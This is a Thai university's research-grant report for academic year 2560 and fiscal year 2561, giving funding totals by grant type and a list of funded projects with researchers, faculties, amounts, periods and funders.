รายงานจำนวนทุน ประจำปีการศึกษา 2560(ช่วงระหว่าง 1 ส.ค. 2560 - 31 ก.ค. 2561)

ประเภททุน

1 ทุนรายได้
5.06%
2,128,000.00
2 ทุนแผ่นดิน
27.22%
11,437,920.00
3 ทุนภายนอก
67.72%
28,457,372.98
รวม 42,023,292.98

รายงานจำนวนทุน ประจำปีงบประมาณ 2561

ประเภททุน

1 ทุนรายได้
11.43%
2,270,000.00
2 ทุนแผ่นดิน
62.44%
12,405,400.00
3 ทุนภายนอก
26.13%
5,191,000.00
รวม 19,866,400.00

รายการข้อมูลโครงการ

จำนวนทั้งหมด 134 รายการ
# โครงการ นักวิจัย สังกัด สัดส่วน จำนวนเงิน ระยะเวลา ประเภททุน แหล่งทุน ปีงบ
1 การพัฒนาและการขึ้นรูปผลิตภัณฑ์บรรจุภัณฑ์เพื่อเพิ่มมูลค่าจากยางพารา อ.ดร.กฤษฎา พัชรสิทธิ์ คณะวิศวกรรมศาสตร์ 100 360,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
2 การผลิตและการศึกษาคุณลักษณะของโปรตีนไฮโดรไลเสตจากกล้ามเนื้อปลาวัว (Abalistes stellaris) โดยใช้เอนไซม์ทริปซินจากตับปลาทูน่าพันธุ์ครีบยาว (Thunnus alalunga) รศ.ดร.สรรพสิทธิ์ กล่อมเกล้า คณะเทคโนโลยีและการพัฒนาชุมชน 100 452,340.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
3 การพัฒนาหลักสูตรภาษาอังกฤษการท่องเที่ยวเชิงอนุรักษ์สำหรับเยาวชนในชุมชนท่องเที่ยวในจังหวัดตรัง ผศ.ดร.เกร็ดทราย วุฒิพงษ์ คณะมนุษยศาสตร์และสังคมศาสตร์ 100 270,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
4 การพัฒนาผลิตภัณฑ์เครื่องดื่มเพื่อสุขภาพจากลูกหยี ผศ.ดร.พรพิมล มะยะเฉียว คณะเทคโนโลยีและการพัฒนาชุมชน 100 360,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
5 คุณสมบัติทางกายภาพ-เคมี และกิจกรรมการต้านอนุมูลอิสระของแป้งข้าวสังข์หยดบดแห้ง และบดเปียกและการประยุกต์ใช้ในการผลิตกาละแม อ.ดร.ถาวร จันทโชติ คณะเทคโนโลยีและการพัฒนาชุมชน 100 198,450.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
6 การพัฒนาวิธีการประกันการก่อตัวของคลัสเตอร์ภูมิภาคอุตสาหกรรมประมง.กรณีจังหวัดชายแดนภาคใต้ รศ.ดร.ชินสัคค สุวรรณอัจฉริย คณะเศรษฐศาสตร์และบริหารธุรกิจ 100 346,500.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
7 การประยุกต์ใช้ Stress treatment ชะลอการเปลี่ยนแปลงสีของกลีบเลี้ยงและขั้วผล และยืดอายุการเก็บรักษาของมังคุด ผศ.ดร.สมัคร แก้วสุกแสง คณะเทคโนโลยีและการพัฒนาชุมชน 100 330,750.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
8 การผลิตพลังงานทดแทนจากน้ำเสียโรงงานยางพารา และการประยุกต์ใช้เทคนิคการกรองน้ำทิ้งเพื่อผลิตน้ำใส ผศ.ดร.อุษา อ้นทอง คณะวิทยาศาสตร์ 100 450,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
9 การพยากรณ์ลมและกำลังการผลิตไฟฟ้าจากทุ่งกังหันลมในประเทศไทย รศ.ดร.จอมภพ แววศักดิ์ คณะวิทยาศาสตร์ 100 0.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
10 โครงการย่อย 1 การพยากรณ์กำลังผลิตไฟฟ้าจากทุ่งกังหันลม: กรณีศึกษาทุ่งกังหันลมผลิตไฟฟ้าขนาดกำลังการผลิตติดตั้ง 10 เมกะวัตต์ บริเวณอำเภอปากพนัง ของจังหวัดนครศรีธรรมราช ผศ.ดร.วรางคณา เรียนสุทธิ์ คณะวิทยาศาสตร์ 100 302,400.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
11 โครงการย่อย 2 การพยากรณ์ลมด้วยแบบจำลองบรรยากาศ WRF และฐานข้อมูล NCEP-FNL สำหรับประเทศไทย รศ.ดร.จอมภพ แววศักดิ์ คณะวิทยาศาสตร์ 100 472,050.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
12 พลังงานแสงอาทิตย์สำหรับการผลิตไฟฟ้า รศ.ดร.จอมภพ แววศักดิ์ คณะวิทยาศาสตร์ 100 567,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
13 การบริหารจัดการคดีความความมั่นคงในจังหวัดชายแดนภาคใต้ รศ.กรกฎ ทองขะโชค คณะนิติศาสตร์ 100 234,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
14 การศึกษาคุณสมบัติของข้าวไร่ในจังหวัดพัทลุงและการประยุกต์ใช้ในผลิตภัณฑ์เพื่อสุขภาพเชิงพาณิชย์โดยชุมชนมีส่วนร่วม ผศ.ดร.อมรรัตน์ ถนนแก้ว คณะเทคโนโลยีและการพัฒนาชุมชน 100 495,900.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
15 โครงการย่อย 1 สมบัติทางเคมี-กายภาพและกิจกรรมการต้านอนุมูลอิสระของข้าวไร่ในจังหวัดพัทลุงและการประยุกต์ใช้ในผลิตภัณฑ์สำหรับผู้สูงอายุ ผศ.ดร.อมรรัตน์ ถนนแก้ว คณะเทคโนโลยีและการพัฒนาชุมชน 100 283,500.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
16 โครงการย่อย 2 การพัฒนาซีเรียลบาร์จากข้าวไร่ที่ปลูกในจังหวัดพัทลุง น.ส.จรวยพร นุ่มน้อย วิทยาลัยภูมิปัญญาชุมชน 100 189,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2560
17 การศึกษาประสิทธิภาพและประสิทธิผลของอนุภาคนาโนซิงก์ออกไซด์ต่อการยับยั้งเชื้อรา Aspergillus niger บนผลิตภัณฑ์แปรรูปและบรรจุภัณฑ์จักสานจากพืชบางชนิดในท้องถิ่น อ.ดร.ฉัตร ผลนาค คณะวิทยาศาสตร์ 100 269,100.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
18 การท่องเที่ยวอันดามัน: สถานการณ์ แนวโน้ม และแนวทางพัฒนาสู่มาตรฐานสากล รศ.ดร.วาสนา สุวรรณวิจิตร คณะเศรษฐศาสตร์และบริหารธุรกิจ 100 236,250.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
19 ความคาดหวังของประชาชนต่อแนวทางการเสริมสร้างสันติสุขและความสมานฉันท์โดยองค์กรปกครองส่วนท้องถิ่นในพื้นที่จังหวัดชายแดนภาคใต้ อ.อัศว์ศิริ ลาปีอี คณะมนุษยศาสตร์และสังคมศาสตร์ 100 234,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
20 การศึกษาศักยภาพและการพัฒนากระบวนการผลิตถ่านอัดแท่งจากชีวมวลเศษเหลือชนิดต่างๆ ในจังหวัดพัทลุง อ.ดร.รวมพร นิคม คณะวิศวกรรมศาสตร์ 100 270,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
21 การสร้างไฮบริโดมาเซลล์ไลน์ที่สร้างโมโนโคลนอลแอนติบอดีต่อโซมาติก (O) และ แฟลกเจลลา (H) แอนติเจนของเชื้อ Salmonella Typhimurium และ Salmonella Weltevreden ผศ.ดร.มณฑล เลิศวรปรีชา คณะวิทยาศาสตร์ 100 360,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
22 การผลิตไบโอดีเซลชนิดเอทิลเอสเตอร์จากเฟสสารอินทรีย์ที่มีอยู่ในกลีเซอรีนดิบด้วยเอทานอลที่ได้จากกระบวนการแยกคืน อ.ดร.รวมพร นิคม คณะวิศวกรรมศาสตร์ 100 270,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
23 การจำแนกสายพันธุ์ การแสดงออกของยีน Calmodulin และ TCTP และการสังเคราะห์สารเมแทบอไลท์ทุติยภูมิที่ตอบสนองต่อความเครียดในต้นกรดน้ำ (Scoparia dulcis) อ.ดร.เนตรนภา ชะนะ คณะวิทยาศาสตร์ 100 315,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
24 การเตรียมตัวเร่งปฏิกิริยา HZSM-5 เพื่อการผลิตไบโอแก๊สโซลีนจากน้ำมันปาล์ม อ.ดร.โชคชัย เหมือนมาศ คณะวิศวกรรมศาสตร์ 100 315,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
25 ความสำคัญ การปฏิบัติและประสบการณ์ชีวิตของนักมวยไทยในประเทศไทย อ.ดร.ดุษณีย์ สุวรรณคง คณะวิทยาการสุขภาพและการกีฬา 100 225,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
26 การผลิตน้ำมันชีวภาพจากขยะพลาสติกด้วยกระบวนการไพโรไลซิส อ.ดร.โชคชัย เหมือนมาศ คณะวิศวกรรมศาสตร์ 100 270,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
27 การพัฒนาศักยภาพพันธุ์ลูกผสมกระเจี๊ยบเขียวที่มีศักยภาพการผลิตเพื่อการบริโภคใน ภายใต้ของประเทศไทย ผศ.ดร.สรพงษ์ เบญจศรี คณะเทคโนโลยีและการพัฒนาชุมชน 100 180,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
28 การคัดแยกจุลินทรีย์ผลิตพอลิไฮดรอกซีอัลคาโนเอตชนิดความยาวสายขนาดกลางด้วยวิธีทางพันธุวิศวกรรม และการเพิ่มผลผลิตพอลิไฮดรอกซีอัลคาโนเอต ผศ.ดร.กนกพร สังขรักษ์ คณะวิทยาศาสตร์ 100 360,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
29 การผลิตและสมบัติของไซรัปลองกอง อ.ดร.ธิดารัตน์ จุทอง คณะเทคโนโลยีและการพัฒนาชุมชน 100 152,010.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
30 การใช้ประโยชน์วัสดุเศษเหลือโรงงานแปรรูปปลาทูน่า : โปรตีนไฮโดรไลเสตจากไข่ปลาทูน่าพันธุ์ครีบเหลือง (Thunnus albacores) รศ.ดร.สรรพสิทธิ์ กล่อมเกล้า คณะเทคโนโลยีและการพัฒนาชุมชน 100 360,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
31 การเพิ่มขีดความสามารถในการจัดการขยะอันตรายโดยกระบวนการมีส่วนร่วมของชุมชนขององค์กรปกครองส่วนท้องถิ่น กรณีศึกษาองค์กรปกครองส่วนท้องถิ่น อำเภอป่าพะยอม จังหวัดพัทลุง ผศ.ดร.โสมศิริ เดชารัตน์ คณะวิทยาการสุขภาพและการกีฬา 100 141,750.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
32 การผสมวัตถุแกรนูลาร์ในเครื่องผสมไซโลแบบหมุนและไซโลที่มีเครื่องผสมแบบครีบ อ.ดร.วาเรียม ช่วยจันทร์ คณะวิทยาศาสตร์ 100 165,420.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
33 การควบคุมโรคเส้นดำในสวนยางพาด้วยอนุภาคนาโนไทเทเนียมไดออกไซด์เจือด้วยเงินแขวนลอยในไคโตซาน อ.ดร.กรกนก อุบลชลเขต คณะวิศวกรรมศาสตร์ 100 360,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
34 การตรวจวัดปริมาณกัมมันตภาพรังสีในธรรมชาติและการประเมินค่าความเสี่ยงต่อการเป็นมะเร็งตลอดชีพในตัวอย่างดินผิวหน้าและทรายชายหาดที่เก็บจากจังหวัดระยอง ประเทศไทย ผศ.ดร.ประสงค์ เกษราธิคุณ คณะวิทยาศาสตร์ 100 342,000.00 01/12/2560- 31/10/2561 ทุนแผ่นดิน - 2561
35 การพัฒนากระบวนการผลิตปลาส้มด้วยกล้าเชื้อแบคทีเรียกรดแลคติกร่วมกับยีสต์และการแปรรูปผลิตภัณฑ์ อ.ดร.ศุภชัย นิติพันธ์ คณะวิทยาศาสตร์ 100 283,500.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
36 การแก้ไขปัญหาความไม่เสถียรของถังปฏิกรณ์ผลิตก๊าซชีวภาพเชิงพานิชย์จากน้ำทิ้งโรงงานสกัดน้ำมันปาล์มดิบ ผศ.ดร.สมพงศ์ โอทอง คณะวิทยาศาสตร์ 100 342,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
37 การพัฒนารูปแบบห้องเรียนเสมือนจริงผ่านอุปกรณ์สื่อสารเคลื่อนที่เพื่อเสริมสร้างทักษะภาษาอังกฤษด้านการเขียนสำหรับครูระดับประถมศึกษาที่มีบริบทพหุวัฒนธรรมที่แตกต่างกันในสามจังหวัดชายแดนใต้ ผศ.ดร.เกร็ดทราย วุฒิพงษ์ คณะมนุษยศาสตร์และสังคมศาสตร์ 100 180,000.00 01/01/560- 31/10/2561 ทุนแผ่นดิน - 2561
38 การผลิตวัสดุเชิงประกอบเนื้อพื้นยางธรรมชาติที่เสริมแรงด้วยซิลิกอน-ซิลิกอนคาร์ไบด์จากขี้เถ้าแกลบ อ.ดร.เสาวณีย์ สิงห์สโรทัย คณะวิศวกรรมศาสตร์ 100 288,000.00 01/01/560- 31/10/2561 ทุนแผ่นดิน - 2561
39 การผลิตฟิล์มจากเซลลูโลสของต้นปาล์มน้ำมันที่มีอายุมากกว่า 25 ปี อ.ดร.นันทรัตน์ พฤกษาพิทักษ์ คณะวิทยาศาสตร์ 100 315,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2560
40 การผลิตโมโนเอซิลกลีเซอรอลและเชื้อเพลิงชีวภาพโดยไลเปสตรึงรูปด้วยพอลิไฮดรอกซีบิวทิเรต รศ.ดร.กนกพร สังขรักษ์ คณะวิทยาศาสตร์ 100 315,000.00 01/01/560- 31/10/2561 ทุนแผ่นดิน - 2561
41 การคัดเลือกจุลินทรีย์ย่อยสลายเซลลูโลสเพื่อการเพิ่มผลผลิตก๊าซชีวภาพจากน้ำทิ้งโรงงานสกัดน้ำมันปาล์ม ผศ.ดร.สมพงศ์ โอทอง คณะวิทยาศาสตร์ 100 360,000.00 01/11/2560- 31/10/2561 ทุนแผ่นดิน - 2561
42 ศักยภาพการผลิตแก๊สเชื้อเพลิงด้วยกระบวนการแก๊สซิฟิ เคชันจากวัสดุเศษเหลือทางการเกษตรในท้องถิ่น อาจารย์ ดร.นิรมล จันทรชาติ คณะวิทยาศาสตร์ 100 135,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
43 ศักยภาพของสารออกฤทธิ์กลุ่มอัลคาลอยด์และฟลาโวนอยด์ในสมุนไพรไทยที่สนใจต่อฤทธิ์ยับยั้งเอนไซม์อะซีติลโคลีนเอสเทอเรสของโรคอัลไซเมอร์ อาจารย์ ดร.พนิตา ก้งซุ่น คณะวิทยาศาสตร์ 100 150,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
44 ศักยภาพของทรอสโทไคทริดส์ในการพัฒนาเป็นผลิตภัณฑ์เสริมในอาหารสำหรับปลานิล อาจารย์ ดร.พฤทฐิภร ศุภพล คณะวิทยาศาสตร์ 100 128,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
45 ศักยภาพในการต้านออกซิเดชันและยับยั้งเอนไซม์ไทโรซิเนสของสารสกัดรากมะพูด อาจารย์ปริชาติ เทพทอง คณะวิทยาศาสตร์ 100 113,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
46 การจัดการน้ำเสียและกลิ่นเหม็นจากการผลิตยางแผ่นด้วยเทคโนโลยีสะอาด น้ำหมักจุลินทรีย์ และระบบก๊าซชีวภาพ อาจารย์วิกาญดา ทองเนื้อแข็ง คณะวิทยาศาสตร์ 100 153,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
47 สู่สังคมผู้ประกอบการหญิงในชนบท:การศึกษาเชิงประวัติศาสตร์เพื่อการพัฒนาบริเวณอำเภอสทิงพระ จังหวัดสงขลา พ.ศ.2551-2561 รองศาสตราจารย์ ดร.อดิศร ศักดิ์สูง คณะมนุษยศาสตร์และสังคมศาสตร์ 100 85,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
48 เพลงเด็กมลายูปาตานี ผู้ช่วยศาสตราจารย์ ดร.นูรียัน สาแล๊ะ คณะมนุษยศาสตร์และสังคมศาสตร์ 100 120,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
49 สถานภาพการวิจัยวรรณกรรมท้องถิ่นภาคเหนือ อีสาน และกลางในรอบสองทศวรรษ (พ.ศ.2540-2560) ผู้ช่วยศาสตราจารย์ ดร.พัชลินจ์ จีนนุ่น คณะมนุษยศาสตร์และสังคมศาสตร์ 100 68,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
50 การสังเคราะห์ผงนาโนนิกเกิลแอนทิโมนีโด๊ปทินออกไซด์โดยกระบวนการสารลดแรงตึงผิวและศึกษาคุณสมบัติ อาจารย์ ดร.สุปานดี มณีโลกย์ คณะวิทยาการสุขภาพและการกีฬา 100 120,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
51 ฤทธิ์ต้านมะเร็งและต้านการอักเสบของสารสกัดจากหัว ไอ้เหล็ก (Smilax ovalifolia) อาจารย์จารุรัตน์ ปัญโญ คณะวิทยาการสุขภาพและการกีฬา 100 145,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
52 ปรากฏการณ์และการอุบัติของโรคที่เกิดจากเชื้อราและแบคทีเรียในการปลูกเมล่อนในโรงเรือนใน 4 จังหวัดภาคใต้ของประเทศไทย อาจารย์ ดร.ปริศนา วงค์ล้อม คณะเทคโนโลยีและการพัฒนาชุมชน 100 120,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
53 การคัดเลือกและปรับปรุงพันธุ์ของไก่คอล่อน อาจารย์วิศาล อดทน คณะเทคโนโลยีและการพัฒนาชุมชน 100 135,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
54 นวัตกรรมการจัดการศึกษา อิงแนวคิดการวัดประเมินเพื่อพัฒนาการเรียนรู้: แนวทางการขับเคลื่อนการศึกษา 4.0 ผู้ช่วยศาสตราจารย์ ดร.ณัชชา มหปุญญานนท์ คณะศึกษาศาสตร์ 100 75,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
55 รูปแบบการพัฒนาคุณภาพงานวิชาการโดยยึดหลักการสร้างชุมชนแห่งการเรียนรู้ทางวิชาชีพครูวิทยาศาสตร์ในสถานศึกษาขั้นพื้นฐาน ผู้ช่วยศาสตราจารย์ ดร.พศรเบศวณ์ เวชวิริยะสกุล คณะศึกษาศาสตร์ 100 140,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
56 การยอมรับเทคโนโลยีของวิสาหกิจขนาดกลางและขนาดย่อมในจังหวัดสงขลา:การวิเคราะห์กลุ่มพหุ ผู้ช่วยศาสตราจารย์ ดร.อรจันทร์ ศิริโชติ คณะเศรษฐศาสตร์และบริหารธุรกิจ 100 68,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
57 การประพันธ์เพลงตับเรื่องประวัติศาสตร์เมืองสงขลา อาจารย์คฑาวุธ พรหมลิ คณะศิลปกรรมศาสตร์ 100 113,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนวิจัยตามยุทธศาสตร์ 2561
58 การกำจัดโครเมียมในน้ำเสียโรงงานผลิตกระป๋องโดยกระบวนทางไฟฟ้าเคมี อาจารย์ ดร. สุปานดี มณีโลกย์ คณะวิทยาการสุขภาพและการกีฬา 100 100,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนพัฒนานักวิจัยรุ่นใหม่ 2561
59 มาตรการทางกฎหมายในการคุ้มครองสิทธิในที่ดินของกลุ่มชาติพันธุ์ชาวเล อาจารย์ภาณุวัฒน์ ปานแก้ว คณะนิติศาสตร์ 100 80,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนพัฒนานักวิจัยรุ่นใหม่ 2561
60 ตัวแบบ Capture-recapture สำหรับประมาณการจำนวนผู้ป่วยสะเก็ดเงินแฝงในจังหวัดตรังในปี พ.ศ.2555 ถึง 2560 อาจารย์อรสา อนันต์ คณะวิทยาศาสตร์ 100 80,000.00 01/06/2561- 31/05/2562 ทุนรายได้ ทุนพัฒนานักวิจัยรุ่นใหม่ 2561
61 ความพึงพอใจของผู้ใช้บริการ และแผนการปรับปรุงการให้บริการของการรถไฟแห่งประเทศไทย อ.ดร.อรพินท์ บุญสิน คณะมนุษยศาสตร์และสังคมศาสตร์ 100 2,030,000.00 12/09/2560- 12/09/2561 ทุนภายนอก ฝ่ายการเดินรถ การรถไฟแห่งประเทศไทย 2560
62 การพัฒนาผลิตภัณฑ์ชีวบำบัดภัณฑ์จากแบคทีเรียเพื่อทำความสะอาดพื้นที่ปนเปื้อนน้ำมันและไขมัน ผศ.ดร.สมพงศ์ โอทอง คณะวิทยาศาสตร์ 100 490,000.00 15/09/2560- 15/09/2561 ทุนภายนอก สำนักงานคณะกรรมการอุดมศึกษา (สกอ.) โครงการวิจัยและพัฒนาภาครัฐร่วมเอกชนในเชิงพาณิชย์ ประจำปี 2560 จากมหาวิทยาลัยสงขลานครินทร์ 2560
63 Enzyme Solution for Hybrid catfish : effects of different enzyme solutions on apparent feed digestibility in hybrid catfish. (Ciarias macrocephalus X Clarias gariepinus) ผศ.ดร.สุภฎา คีรีรัฐนิคม คณะวิทยาศาสตร์ 100 428,792.47 16/10/2560- 16/10/2561 ทุนภายนอก ประเทศสิงคโปร์ (DSM Singapore Industrial Pte. Ltd.) 2560
64 รูปแบบการจัดการศึกษาต่อเนื่องและแหล่งเรียนรู้ในวัดพุทธารามเพื่อส่งเสริมการพัฒนาทรัพยากรมนุษย์ ด้านทำนุบำรุงศิลปวัฒนธรรมไทย ภูมิปัญญาท้องถิ่นให้กับพุทธศาสนิกชนไทยในสหราชอาณาจักร อ.ดร.จิดาภา สุวรรณฤกษ์ วิทยาลัยนานาชาติ 100 300,000.00 18/10/2560- 18/10/2561 ทุนภายนอก วัดพุทธาราม กรุงลอนดอน สหราชอาณาจักร 2560
65 สำรวจความพึงพอใจของประชาชนที่มีต่อผลการดำเนินงานขององค์กรปกครองส่วนท้องถิ่น ประจำปีงบประมาณ พ.ศ. 2556-2560 (การดำเนินการวิจัยฯ ปีงบประมาณ 2560) ผศ.สุธรรม ขนาบศักดิ์ คณะเศรษฐศาสตร์และบริหารธุรกิจ 100 3,241,900.00 22/11/2560- 22/11/2561 ทุนภายนอก อบต. ในพื้นที่ 5 จว.ภาคใต้ 2560
66 โครงการปฏิบัติการจัดการศึกษาเพื่อสร้างทักษะชีวิตเด็กและเยาวชนในสถานพินิจและคุ้มครองเด็กและเยาวชน และศูนย์ฝึกและศูนย์อบรมเด็กและเยาวชนในจังหวัดภาคใต้ ผศ.ดร.มณฑนา พิพัฒน์เพ็ญ คณะศึกษาศาสตร์ 100 1,000,000.00 26/12/2560- 26/12/2561 ทุนภายนอก สำนักงานปลัดกระทรวงยุติธรรม 2560
67 ความพึงพอใจของผู้ใช้บริการ และแผนการปรับปรุงการให้บริการของการรถไฟแห่งประเทศไทย ประจำปีงบประมาณ 2559 อาจารย์ ดร.อรพินท์ บุญสิน คณะมนุษยศาสตร์และสังคมศาสตร์ 100 2,030,000.00 05/01/2561- 05/01/2562 ทุนภายนอก ฝ่ายการเดินรถ การรถไฟแห่งประเทศไทย 2560
68 โครงการวิจัยและพัฒนารูปแบบ กลไกการเสริมสร้างวินัยในสถานศึกษาระดับการศึกษาขั้นพื้นฐาน ด้านการมีจิตอาสา เสียสละ เห็นอกเห็นใจผู้อื่น ผศ.ดร. อมลวรรณ วีระธรรมโม คณะศึกษาศาสตร์ 100 1,200,000.00 19/01/2561- 19/01/2562 ทุนภายนอก สำนักงานเลขาธิการสภาการศึกษา 2560
69 การพัฒนากฎหมายเกี่ยวกับทะเบียนประวัติอาชญากรของเด็กและเยาวชน อาจารย์ปพนธีร์ ธีระพันธ์ คณะนิติศาสตร์ 100 330,000.00 01/02/2561- 01/02/2562 ทุนภายนอก สำนักงานคณะกรรมการวิจัยแห่งชาติ (วช.) 2560
70 โครงการปฏิบัติการจัดการศึกษาเพื่อสร้างทักษะชีวิตเด็กและเยาวชนในสถานพินิจและคุ้มครองเด็กและเยาวชน และศูนย์ฝึกและศูนย์อบรมเด็กและเยาวชนในจังหวัดภาคใต้ ผศ.ดร.มณฑนา พิพัฒน์เพ็ญ คณะศึกษาศาสตร์ 100 1,000,000.00 05/02/2561- 05/02/2562 ทุนภายนอก สำนักงานปลัดกระทรวงยุติธรรม 2560
71 การปรับปรุงค่าความร้อนของวัสดุผสมเพื่อเป็นเชื้อเพลิงจากขยะชีวมวลจากปาล์ม และชีวภาพมวลมะพร้าว อาจารย์ ดร.พีรนาฎ คิดดี คณะวิทยาศาสตร์ 100 250,000.00 16/03/2561- 16/03/2562 ทุนภายนอก สำนักพัฒนาวิทยาศาสตร์และเทคโนโลยีแห่งชาติ (สวทช.) 2560
72 การกำจัดก๊าซไฮโดรเจนซัลไฟด์ในก๊าซชีวภาพด้วยระบบ Denitrifying Sulfide Remova ผศ.ดร.อุษา อ้นทอง คณะวิทยาศาสตร์ 100 470,000.00 16/03/2561- 16/03/2562 ทุนภายนอก สำนักงานพัฒนาเศรษฐกิจจากฐานชีวภาพ (องค์การมหาชน) 2560
73 นวัตกรรมการพัฒนานักศึกษาครูเพื่อเสริมสร้างสมรรถนะการจัดการเรียนรู้เพื่อการอยู่ร่วมกัน อ.ดร.สุธาสินี บุญญาพิทักษ์ คณะศึกษาศาสตร์ 100 12,491.00 20/03/2561- 20/03/2562 ทุนภายนอก สำนักงานกองทุนสนับสนุนการวิจัย (สกว.) 2560
74 ชุดโครงกาาวิจัยการจัดกระบวนการเรียนรู้เพื่อเสริมสร้างนักเรียนให้มีทักษะศตวรรษที่ 21 และส่งเสริมคุณธรรมจริยธรรม ผ่านกิจกรรมลดเวลาเรียนเพิ่มเวลารู้ โดยใช้กระบวนการชุมชนวิชาชีพครู (Professional Learning Community) และการสอนงานและเป็นพี่เลี้ยง (Coaching and Mentoring) ในสถานศึกษาระดับประถมศึกษา จังหวัดสงขลา – ภายใต้โครงการพัฒนาคุณภาพการศึกษาและการพัฒนาท้องถิ่นโดยมีสถาบันอุดมศึกษาเป็นพี่เลี้ยง ประจำปี 2561 (มหาวิทยาลัยทักษิณ ร่วมเป็นส่วนหนึ่งในการจัดทำรายละเอียดกิจกรรม) ประกอบด้วย 7 โครงการย่อย ผศ.ดร.อมลวรรณ วีระธรรมโม คณะศึกษาศาสตร์ 100 960,000.00 30/03/2561- 30/03/2562 ทุนภายนอก สำนักงานเครือข่ายอุดมศึกษาภาคใต้ตอนล่าง 2560
75 การพัฒนากระบวนการคัดเลือกเมล็ดพันธุ์ดีและเก็บรักษาเมล็ดพันธุ์อย่างมีประสิทธิภาพข้าวสังข์หยดอินทรีย์ในจังหวัดพัทลุง อ.ดร.อนิศรา เพ็ญสุข ติ๊บแก้ว คณะเทคโนโลยีและการพัฒนาชุมชน 100 750,000.00 31/03/2561- 31/03/2562 ทุนภายนอก โครงการ Innovation Hub – Agriculture & Food เพื่อสร้างเศรษฐกิจฐานนวัตกรรมของประเทศตามนโยบายประเทศไทย 4.0 2560
76 การดำเนินการสำรวจระดับความพึงพอใจของผู้ใช้บริการของการรถไฟแห่งประเทศไทย และสำรวจปัจจัยที่ส่งผลต่อความเชื่อมั่นของประชาชนในการเลือกใช้บริการของการรถไฟแห่งประเทศไทย ประจำปีงบประมาณ 2560 อ.ดร.อรพินท์ บุญสิน คณะมนุษยศาสตร์และสังคมศาสตร์ 100 4,145,948.00 11/04/2561- 11/04/2562 ทุนภายนอก กลุ่มธุรกิจการเดินรถ การรถไฟแห่งประเทศไทย 2560
77 โครงการปฏิบัติการจัดการศึกษาเพื่อสร้างทักษะชีวิตเด็กและเยาวชนในสถานพินิจและคุ้มครองเด็กและเยาวชน และศูนย์ฝึกและศูนย์อบรมเด็กและเยาวชนในจังหวัดภาคใต้ ผศ.ดร.มณฑนา พิพัฒน์เพ็ญ คณะศึกษาศาสตร์ 100 1,000,000.00 27/04/2561- 27/04/2562 ทุนภายนอก สำนักงานปลัดกระทรวงยุติธรรม 2560
